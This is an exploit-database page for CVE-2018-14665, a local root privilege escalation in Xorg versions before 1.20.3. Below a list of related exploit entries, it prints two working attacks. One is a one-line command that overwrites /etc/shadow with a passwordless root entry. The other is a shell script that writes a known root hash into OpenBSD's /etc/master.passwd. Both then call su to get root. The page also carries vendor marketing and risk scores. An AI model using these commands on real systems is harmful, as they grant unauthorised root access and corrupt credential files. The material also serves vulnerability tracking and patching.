Vulners
Lucene search
xorg-x11-server < 1.20.3 - Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 131 |
|---|---|---|---|---|
 | xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit | 26 Oct 201800:00 | – | zdt |
| xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2) | 26 Oct 201800:00 | – | zdt |
| xorg #x11 #server 1.20.3 - Privilege Escalation Exploit (3) | 30 Oct 201800:00 | – | zdt |
| xorg-x11-server < 1.20.1 - Local Privilege Escalation Exploit | 13 Nov 201800:00 | – | zdt |
| Xorg X11 Server SUID Privilege Escalation Exploit | 26 Nov 201800:00 | – | zdt |
| xorg-x11-server < 1.20.3 - modulepath Local Privilege Escalation Exploit | 1 Dec 201800:00 | – | zdt |
| Xorg X11 Server (AIX) - Local Privilege Escalation Exploit | 4 Dec 201800:00 | – | zdt |
| xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Exploit | 14 Jan 201900:00 | – | zdt |
| Xorg X11 Server SUID modulepath Privilege Escalation Exploit | 22 Oct 201900:00 | – | zdt |
| Xorg X11 Server Local Privilege Escalation Exploit | 13 Nov 201900:00 | – | zdt |
10
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Oct 2018 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 36.6
CVSS 27.2
EPSS0.16034